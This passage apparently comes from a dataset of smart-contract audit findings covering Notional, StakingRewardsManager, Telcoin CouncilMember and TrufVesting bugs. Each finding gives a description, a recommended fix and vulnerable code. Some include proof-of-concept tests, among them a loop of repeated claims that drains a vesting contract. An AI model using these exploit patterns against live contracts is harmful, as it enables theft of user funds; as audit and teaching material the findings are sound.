No underflow possible since targetExternalUnderlyingLend\\n// Remove the line below\\n // is floored at zero.\\n// Remove the line below\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n// Remove the line below\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n// Remove the line below\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n// Remove the line below\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n// Remove the line below\\n );\\n\\n// Add the line below\\n targetAmount = SafeUint256.min(uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),maxExternalUnderlyingLend);\\n// Add the line below\\n if (targetAmount > oracleData.currentExternalUnderlyingLend) { //when deposit , must check maxExternalDeposit\\n// Add the line below\\n uint256 forDeposit = targetAmount // Remove the line below\\n oracleData.currentExternalUnderlyingLend;\\n// Add the line below\\n if (forDeposit > oracleData.maxExternalDeposit) {\\n// Add the line below\\n targetAmount = targetAmount.sub(\\n// Add the line below\\n forDeposit // Remove the line below\\n oracleData.maxExternalDeposit\\n// Add the line below\\n ); \\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n","A too small `targetAmount` will cause the withdrawal of deposits that should not be withdrawn, damaging the interests of the protocol.","```\\n function getTargetExternalLendingAmount(\\n Token memory underlyingToken,\\n PrimeCashFactors memory factors,\\n RebalancingTargetData memory rebalancingTargetData,\\n OracleData memory oracleData,\\n PrimeRate memory pr\\n ) internal pure returns (uint256 targetAmount) {\\n// rest of code\\n\\n targetAmount = SafeUint256.min(\\n // totalPrimeCashInUnderlying and totalPrimeDebtInUnderlying are in 8 decimals, convert it to native\\n // token precision here for accurate comparison. 
No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n" +`wfCashERC4626`,medium,"The `wfCash` vault is credited less prime cash than the `wfCash` it mints to the depositor when its underlying asset is a fee-on-transfer token. This leads to the vault being insolvent because it has issued more shares than can be redeemed.\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n\\n```\\n } else {\\n // In the case of deposits, we use a balance before and after check\\n // to ensure that we record the proper balance change.\\n actualTransferExternal = GenericToken.safeTransferIn(\\n underlying.tokenAddress, account, underlyingExternalDeposit\\n ).toInt();\\n }\\n\\n netPrimeSupplyChange = _postTransferPrimeCashUpdate(\\n account, currencyId, actualTransferExternal, underlying, primeRate\\n );\\n```\\n\\n```\\n // Mints ERC20 tokens for the receiver\\n _mint(receiver, fCashAmount);\\n```\\n\\nIn the case of lending at 0% interest, `fCashAmount` is equal to `depositAmount` but at 1e8 precision.\\nTo simplify the example, let us assume that there are no other depositors. 
When the sole depositor redeems all their `wfCash` shares at maturity, they will be unable to redeem all their shares because the `wfCash` vault does not hold enough prime cash.","Consider adding the following:\\nA flag in `wfCashERC4626` that signals that the vault's asset is a fee-on-transfer token.\\nIn `wfCashERC4626._previewMint()` and `wfCashERC46262._previewDeposit`, all calculations related to `assets` should account for the transfer fee of the token.","Although the example used to display the vulnerability is for the case of lending at 0% interest, the issue exists for minting any amount of shares.\\nThe `wfCashERC4626` vault will become insolvent and unable to buy back all shares. The larger the total amount deposited, the larger the deficit. The deficit is equal to the transfer fee. Given a total deposit amount of 100M USDT and a transfer fee of 2% (assuming a transfer fee was set and enabled for USDT), 2M USDT will be the deficit.\\nThe last depositors to redeem their shares will be shouldering the loss.","```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n" +`ExternalLending`,medium,"When the Treasury rebalances and has to redeem aTokens from AaveV3, it checks that the actual amount withdrawn is greater than or equal to the set `withdrawAmount`. This check will always fail for fee-on-transfer tokens since the `withdrawAmount` does not account for the transfer fee.\\n```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 
2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n\\nNote that the third field in the `RedeemData` struct is the `expectedUnderlying` field which is set to the `withdrawAmount` and that `withdrawAmount` is a value greater than zero.\\n```\\n for (uint256 j; j < data.targets.length; j++) {\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n\\n // Ensure that we get sufficient underlying on every redemption\\n uint256 newUnderlyingBalance = TokenHandler.balanceOf(underlyingToken, address(this));\\n uint256 underlyingBalanceChange = newUnderlyingBalance.sub(oldUnderlyingBalance);\\n // If the call is not the final redemption, then expectedUnderlying should\\n // be set to zero.\\n require(data.expectedUnderlying <= underlyingBalanceChange);\\n```\\n\\n```\\nredeemAmounts[0] = currentAmount - targetAmount;\\n```\\n\\nIt does not account for transfer fees. 
In effect, that check will always revert when the underlying being withdrawn is a fee-on-transfer token.","When computing for the `withdrawAmount / data.expectedUnderlying`, it should account for the transfer fees. The pseudocode for the computation may look like so:\\n```\\nwithdrawAmount = currentAmount - targetAmount\\nif (underlyingToken.hasTransferFee) {\\n withdrawAmount = withdrawAmount / (100% - underlyingToken.transferFeePercent)\\n}\\n```\\n","```\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n ExternalLending.redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n```\\n\\nThis means that these tokens can only be deposited into AaveV3 but can never redeemed. This can lead to insolvency of the protocol.","```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 
1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n" +`StakingRewardsManager::topUp(...)` Misallocates Funds to `StakingRewards` Contracts,high,"The `StakingRewardsManager::topUp(...)` contract exhibits an issue where the specified `StakingRewards` contracts are not topped up at the correct indices, resulting in an incorrect distribution to different contracts.\\nThe `StakingRewardsManager::topUp(...)` function is designed to top up multiple `StakingRewards` contracts simultaneously by taking the indices of the contract's addresses in the `StakingRewardsManager::stakingContracts` array. However, the flaw lies in the distribution process:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n\\nGitHub: [254-278]\\nThe rewards are not appropriately distributed to the `StakingRewards` contracts at the specified indices. Instead, they are transferred to the contracts at the loop indices. 
For instance, if intending to top up contracts at indices `[1, 2]`, the actual top-up occurs at indices `[0, 1]`.","It is recommended to do the following changes:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i// Add the line below\\n// Add the line below\\n) {\\n // get staking contract and config\\n// Remove the line below\\n StakingRewards staking = stakingContracts[i];\\n// Add the line below\\n StakingRewards staking = stakingContracts[indices[i]];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n","The consequence of this vulnerability is that rewards will be distributed to the incorrect staking contract, leading to potential misallocation and unintended outcomes","```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n" +Wrong parameter when retrieving causes a complete DoS of the protocol,high,"A 
wrong parameter in the `_retrieve()` prevents the protocol from properly interacting with Sablier, causing a Denial of Service in all functions calling `_retrieve()`.\\nThe `CouncilMember` contract is designed to interact with a Sablier stream. As time passes, the Sablier stream will unlock more TELCOIN tokens which will be available to be retrieved from `CouncilMember`.\\nThe `_retrieve()` internal function will be used in order to fetch the rewards from the stream and distribute them among the Council Member NFT holders (snippet reduced for simplicity):\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThe most important part in `_retrieve()` regarding the vulnerability that we'll dive into is the `_stream.execute()` interaction and the params it receives. In order to understand such interaction, we first need understand the importance of the `_stream` and the `_target` variables.\\nSablier allows developers to integrate Sablier via Periphery contracts, which prevents devs from dealing with the complexity of directly integrating Sablier's Core contracts. Telcoin developers have decided to use these periphery contracts. Concretely, the following contracts have been used:\\nNOTE: It is important to understand that the actual lockup linear stream will be deployed as well. The difference is that the Telcoin protocol will not interact with that contract directly. Instead, the PRBProxy and proxy target contracts will be leveraged to perform such interactions.\\nKnowing this, we can now move on to explaining Telcoin's approach to withdrawing the available tokens from the stream. 
As seen in the code snippet above, the `_retrieve()` function will perform two steps to actually perform a withdraw from the stream:\\nIt will first call the _stream's `execute()` function (remember `_stream` is a PRBProxy). This function receives a `target` and some `data` as parameter, and performs a delegatecall aiming at the target:\\nIn the `_retrieve()` function, the target where the call will be forwarded to is the `_target` parameter, which is a ProxyTarget contract. Concretely, the delegatecall function that will be triggered in the ProxyTarget will be withdrawMax():\\nAs we can see, the `withdrawMax()` function has as parameters the `lockup` stream contract `to` withdraw from, the `streamId` and the address `to` which will receive the available funds from the stream. The vulnerability lies in the parameters passed when calling the `withdrawMax()` function in `_retrieve()`. As we can see, the first encoded parameter in the `encodeWithSelector()` call after the selector is the _target:\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, // <------- This is incorrect\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThis means that the proxy target's `withdrawMax()` function will be triggered with the `_target` contract as the `lockup` parameter, which is incorrect. 
This will make all calls eventually execute `withdrawMax()` on the PRBProxy contract, always reverting.\\nThe parameter needed to perform the `withdrawMax()` call correctly is the actual Sablier lockup contract, which is currently not stored in the `CouncilMember` contract.\\nThe following diagram also summarizes the current wrong interactions for clarity:","In order to fix the vulnerability, the proper address needs to be passed when calling `withdrawMax()`.\\nNote that the actual stream address is currently NOT stored in `CouncilMember.sol`, so it will need to be stored (my example shows a new `actualStream` variable)\\n```\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n// Remove the line below\\n _target, \\n// Add the line below\\n actualStream\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n","High. ALL withdrawals from the Sablier stream will revert, effectively causing a DoS in the _retrieve() function. 
Because the _retrieve() function is called in all the main protocol functions, this vulnerability essentially prevents the protocol from ever functioning correctly.\\nProof of Concept\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport {Test, console2} from ""forge-std/Test.sol"";\\nimport {SablierV2Comptroller} from ""@sablier/v2-core/src/SablierV2Comptroller.sol"";\\nimport {SablierV2NFTDescriptor} from ""@sablier/v2-core/src/SablierV2NFTDescriptor.sol"";\\nimport {SablierV2LockupLinear} from ""@sablier/v2-core/src/SablierV2LockupLinear.sol"";\\nimport {ISablierV2Comptroller} from ""@sablier/v2-core/src/interfaces/ISablierV2Comptroller.sol"";\\nimport {ISablierV2NFTDescriptor} from ""@sablier/v2-core/src/interfaces/ISablierV2NFTDescriptor.sol"";\\nimport {ISablierV2LockupLinear} from ""@sablier/v2-core/src/interfaces/ISablierV2LockupLinear.sol"";\\n\\nimport {CouncilMember, IPRBProxy} from ""../src/core/CouncilMember.sol"";\\nimport {TestTelcoin} from ""./mock/TestTelcoin.sol"";\\nimport {MockProxyTarget} from ""./mock/MockProxyTarget.sol"";\\nimport {PRBProxy} from ""./mock/MockPRBProxy.sol"";\\nimport {PRBProxyRegistry} from ""./mock/MockPRBProxyRegistry.sol"";\\n\\nimport {UD60x18} from ""@prb/math/src/UD60x18.sol"";\\nimport {LockupLinear, Broker, IERC20} from ""@sablier/v2-core/src/types/DataTypes.sol"";\\nimport {IERC20 as IERC20OZ} from ""@openzeppelin/contracts/token/ERC20/IERC20.sol"";\\n\\ncontract PocTest is Test {\\n\\n ////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n ////////////////////////////////////////////////////////////////\\n\\n bytes32 public constant GOVERNANCE_COUNCIL_ROLE =\\n keccak256(""GOVERNANCE_COUNCIL_ROLE"");\\n bytes32 public constant SUPPORT_ROLE = keccak256(""SUPPORT_ROLE"");\\n\\n ////////////////////////////////////////////////////////////////\\n // STORAGE //\\n ////////////////////////////////////////////////////////////////\\n\\n /// @notice Poc 
Users\\n address public sablierAdmin;\\n address public user;\\n\\n /// @notice Sablier contracts\\n SablierV2Comptroller public comptroller;\\n SablierV2NFTDescriptor public nftDescriptor;\\n SablierV2LockupLinear public lockupLinear;\\n\\n /// @notice Telcoin contracts\\n PRBProxyRegistry public proxyRegistry;\\n PRBProxy public stream;\\n MockProxyTarget public target;\\n CouncilMember public councilMember;\\n TestTelcoin public telcoin;\\n\\n function setUp() public {\\n // Setup users\\n _setupUsers();\\n\\n // Deploy token\\n telcoin = new TestTelcoin(address(this));\\n\\n // Deploy Sablier \\n _deploySablier();\\n\\n // Deploy council member\\n councilMember = new CouncilMember();\\n\\n // Setup stream\\n _setupStream();\\n\\n // Setup the council member\\n _setupCouncilMember();\\n }\\n\\n function testPoc() public {\\n // Step 1: Mint council NFT to user\\n councilMember.mint(user);\\n assertEq(councilMember.balanceOf(user), 1);\\n\\n // Step 2: Forward time 1 days\\n vm.warp(block.timestamp + 1 days);\\n \\n // Step 3: All functions calling _retrieve() (mint(), burn(), removeFromOffice()) will fail\\n vm.expectRevert(abi.encodeWithSignature(""PRBProxy_ExecutionReverted()"")); \\n councilMember.mint(user);\\n }\\n\\n function _setupUsers() internal {\\n sablierAdmin = makeAddr(""sablierAdmin"");\\n user = makeAddr(""user"");\\n }\\n\\n function _deploySablier() internal {\\n // Deploy protocol\\n comptroller = new SablierV2Comptroller(sablierAdmin);\\n nftDescriptor = new SablierV2NFTDescriptor();\\n lockupLinear = new SablierV2LockupLinear(\\n sablierAdmin,\\n ISablierV2Comptroller(address(comptroller)),\\n ISablierV2NFTDescriptor(address(nftDescriptor))\\n );\\n }\\n\\n function _setupStream() internal {\\n\\n // Deploy proxies\\n proxyRegistry = new PRBProxyRegistry();\\n stream = PRBProxy(payable(address(proxyRegistry.deploy())));\\n target = new MockProxyTarget();\\n\\n // Setup stream\\n LockupLinear.Durations memory durations = 
LockupLinear.Durations({\\n cliff: 0,\\n total: 1 weeks\\n });\\n\\n UD60x18 fee = UD60x18.wrap(0);\\n\\n Broker memory broker = Broker({account: address(0), fee: fee});\\n LockupLinear.CreateWithDurations memory params = LockupLinear\\n .CreateWithDurations({\\n sender: address(this),\\n recipient: address(stream),\\n totalAmount: 100e18,\\n asset: IERC20(address(telcoin)),\\n cancelable: false,\\n transferable: false,\\n durations: durations,\\n broker: broker\\n });\\n\\n bytes memory data = abi.encodeWithSelector(target.createWithDurations.selector, address(lockupLinear), params, """");\\n\\n // Create the stream through the PRBProxy\\n telcoin.approve(address(stream), type(uint256).max);\\n bytes memory response = stream.execute(address(target), data);\\n assertEq(lockupLinear.ownerOf(1), address(stream));\\n }\\n\\n function _setupCouncilMember() internal {\\n // Initialize\\n councilMember.initialize(\\n IERC20OZ(address(telcoin)),\\n ""Test Council"",\\n ""TC"",\\n IPRBProxy(address(stream)), // stream_\\n address(target), // target_\\n 1, // id_\\n address(lockupLinear)\\n );\\n\\n // Grant roles\\n councilMember.grantRole(GOVERNANCE_COUNCIL_ROLE, address(this));\\n councilMember.grantRole(SUPPORT_ROLE, address(this));\\n }\\n \\n}\\n```\\n","```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n" +CouncilMember:burn renders the contract inoperable after the first execution,high,"The CouncilMember contract suffers from a critical vulnerability that misaligns the balances array after a successful burn, rendering the contract inoperable.\\nThe root cause of the vulnerability is that the `burn` function incorrectly manages the `balances` array, 
shortening it by one each time an ERC721 token is burned while the latest minted NFT still withholds its unique `tokenId` which maps to the previous value of `balances.length`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n\\nThis misalignment between existing `tokenIds` and the `balances` array results in several critical impacts:\\nHolders with `tokenId` greater than the length of balances cannot claim.\\nSubsequent burns of `tokenId` greater than balances length will revert.\\nSubsequent mint operations will revert due to `tokenId` collision. As `totalSupply` now collides with the existing `tokenId`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function mint(\\n // rest of code\\n balances.push(0);\\n _mint(newMember, totalSupply());// <= FOUND\\n }\\n```\\n\\nThis mismanagement creates a cascading effect, collectively rendering the contract inoperable. 
Following POC will demonstrate the issue more clearly in codes.\\nPOC\\nRun `git apply` on the following patch then run `npx hardhat test` to run the POC.\\n```\\ndiff --git a/telcoin-audit/test/sablier/CouncilMember.test.ts b/telcoin-audit/test/sablier/CouncilMember.test.ts\\nindex 675b89d..ab96b08 100644\\n--- a/telcoin-audit/test/sablier/CouncilMember.test.ts\\n+++ b/telcoin-audit/test/sablier/CouncilMember.test.ts\\n@@ -1,13 +1,14 @@\\n import { expect } from ""chai"";\\n import { ethers } from ""hardhat"";\\n import { SignerWithAddress } from ""@nomicfoundation/hardhat-ethers/signers"";\\n-import { CouncilMember, TestTelcoin, TestStream } from ""../../typechain-types"";\\n+import { CouncilMember, TestTelcoin, TestStream, ERC721Upgradeable__factory } from ""../../typechain-types"";\\n \\n describe(""CouncilMember"", () => {\\n let admin: SignerWithAddress;\\n let support: SignerWithAddress;\\n let member: SignerWithAddress;\\n let holder: SignerWithAddress;\\n+ let lastCouncilMember: SignerWithAddress;\\n let councilMember: CouncilMember;\\n let telcoin: TestTelcoin;\\n let stream: TestStream;\\n@@ -18,7 +19,7 @@ describe(""CouncilMember"", () => {\\n let supportRole: string = ethers.keccak256(ethers.toUtf8Bytes(""SUPPORT_ROLE""));\\n \\n beforeEach(async () => {\\n- [admin, support, member, holder, target] = await ethers.getSigners();\\n+ [admin, support, member, holder, target, lastCouncilMember] = await ethers.getSigners();\\n \\n const TestTelcoinFactory = await ethers.getContractFactory(""TestTelcoin"", admin);\\n telcoin = await TestTelcoinFactory.deploy(admin.address);\\n@@ -182,6 +183,22 @@ describe(""CouncilMember"", () => {\\n it(""the correct removal is made"", async () => {\\n await expect(councilMember.burn(1, support.address)).emit(councilMember, ""Transfer"");\\n });\\n+ it.only(""inoperable contract after burn"", async () => {\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.not.reverted;\\n+\\n+ // This 1st burn will cause 
contract inoperable due to tokenId & balances misalignment\\n+ await expect(councilMember.burn(1, support.address)).emit(councilMember, ""Transfer"");\\n+\\n+ // Impact 1. holder with tokenId > balances length cannot claim\\n+ await expect(councilMember.connect(lastCouncilMember).claim(3, 1)).to.revertedWithPanic(""0x32""); // @audit-info 0x32: Array accessed at an out-of-bounds or negative index\\n+\\n+ // Impact 2. subsequent burns of tokenId > balances length will revert\\n+ await expect(councilMember.burn(3, lastCouncilMember.address)).to.revertedWithPanic(""0x32""); \\n+\\n+ // Impact 3. subsequent mint will revert due to tokenId collision\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.revertedWithCustomError(councilMember, ""ERC721InvalidSender"");\\n+\\n+ });\\n });\\n });\\n \\n```\\n\\nResult\\nCouncilMember mutative burn Success ✔ inoperable contract after burn (90ms) 1 passing (888ms)\\nThe Passing execution of the POC confirmed that operations such as `claim`, `burn` & `mint` were all reverted which make the contract inoperable.","It is recommended to avoid popping out balances to keep alignment with uniquely minted tokenId. 
Alternatively, consider migrating to ERC1155, which inherently manages a built-in balance for each NFT.",The severity of the vulnerability is high due to the high likelihood of occurence and the critical impacts on the contract's operability and token holders' ability to interact with their assets.,"```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n" +Users can fully drain the `TrufVesting` contract,high,"Due to flaw in the logic in `claimable` any arbitrary user can drain all the funds within the contract.\\nA user's claimable is calculated in the following way:\\nUp until start time it is 0.\\nBetween start time and cliff time it's equal to `initialRelease`.\\nAfter cliff time, it linearly increases until the full period ends.\\nHowever, if we look at the code, when we are at stage 2., it always returns `initialRelease`, even if we've already claimed it. This would allow for any arbitrary user to call claim as many times as they wish and every time they'd receive `initialRelease`. 
Given enough iterations, any user can drain the contract.\\n```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n\\n```\\n function claim(address user, uint256 categoryId, uint256 vestingId, uint256 claimAmount) public {\\n if (user != msg.sender && (!categories[categoryId].adminClaimable || msg.sender != owner())) {\\n revert Forbidden(msg.sender);\\n }\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (claimAmount == type(uint256).max) {\\n claimAmount = claimableAmount;\\n } else if (claimAmount > claimableAmount) {\\n revert ClaimAmountExceed();\\n }\\n if (claimAmount == 0) {\\n revert ZeroAmount();\\n }\\n\\n categories[categoryId].totalClaimed += claimAmount;\\n userVestings[categoryId][vestingId][user].claimed += claimAmount;\\n trufToken.safeTransfer(user, claimAmount);\\n\\n emit Claimed(categoryId, vestingId, user, claimAmount);\\n }\\n```\\n","change the if check to the following\\n```\\n if (startTime > block.timestamp) {\\n if (initialRelease > userVesting.claimed) {\\n return initialRelease - userVesting.claimed;\\n }\\n else { return 0; } \\n }\\n```\\n\\nPoC\\n```\\n function test_cliffVestingDrain() public { \\n _setupVestingPlan();\\n uint256 categoryId = 2;\\n uint256 vestingId = 0;\\n uint256 stakeAmount = 10e18;\\n uint256 duration = 30 days;\\n\\n vm.startPrank(owner);\\n \\n vesting.setUserVesting(categoryId, 
vestingId, alice, 0, stakeAmount);\\n\\n vm.warp(block.timestamp + 11 days); // warping 11 days, because initial release period is 10 days\\n // and cliff is at 20 days. We need to be in the middle \\n vm.startPrank(alice);\\n assertEq(trufToken.balanceOf(alice), 0);\\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n \\n uint256 balance = trufToken.balanceOf(alice);\\n assertEq(balance, stakeAmount * 5 / 100); // Alice should be able to have claimed just 5% of the vesting \\n\\n for (uint i; i < 39; i++ ){ \\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n }\\n uint256 newBalance = trufToken.balanceOf(alice); // Alice has claimed 2x the amount she was supposed to be vested. \\n assertEq(newBalance, stakeAmount * 2); // In fact she can keep on doing this to drain the whole contract\\n }\\n```\\n",Any user can drain the contract,"```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n" +"`cancelVesting` will potentially not give users unclaimed, vested funds, even if giveUnclaimed = true",high,"The purpose of `cancelVesting` is to cancel a vesting grant and potentially give users unclaimed but vested funds in the event that `giveUnclaimed = true`. 
However, due to a bug, in the event that the user had staked / locked funds, they will potentially not received the unclaimed / vested funds even if `giveUnclaimed = true`.\\nHere's the cancelVesting function in TrufVesting:\\n```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete 